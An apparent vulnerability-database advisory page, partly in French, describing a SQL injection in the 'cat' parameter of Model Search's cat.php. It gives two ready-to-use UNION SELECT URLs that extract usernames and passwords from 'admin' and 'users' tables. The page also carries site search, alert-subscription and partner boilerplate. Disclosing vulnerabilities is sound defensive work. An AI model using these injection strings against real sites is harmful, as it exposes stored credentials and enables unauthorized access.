Model-Search-cat.php-cat-Variable-SQL-Injection, vulnerabilities and axposures online database

Vulnerability details :

		Model Search cat.php cat Parameter SQL Injection

Fiche

Fiche créée le 2008-05-16 17:36:00, dernière mise à jour le 2009-04-30 03:38:42

http://[target]/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+admin/* http://[target]/cat.php?cat=9999999'+union+select+concat(username,0x3a,password)+from+users/*

External refs :

OSVDB 45221

Free consultation (search)


		Fill one or some of the fields below :

		Vendor

		Title

		Vulnerability ref.





Free consultation (catalog)

Individual alerts


		You determine with one profile dynamic and assisted, all your material and software equipment. We shall inform you then automatically, as soon as a notification of security will concern one or several elements of it profile. Every notification is definite, consists of numerous information to determine risk and to protect itself from it.


Login:
Pass:


Free online subscription

Partenaires : Anti-spam - Hébergement France - MySQL Php Suisse - Hosting Canada - Web Php Maroc - WebmasterMalin
Guide de l'affiliation - Guide du paiement électronique et de l'e-currency - Annuaire du Web - Solution e-commerce - Externalisation et outsourcing
e-Marketing et e-Mailing - Comparaison de services - Comparateur Marchands - Bons plans par email - Tests de personnalité et de QI
SMS API - Forums et Petites Annonces Gratuites - Rencontres - Sonneries - Offres du Web - Arrêter de fumer - Guide des mobiles et PDA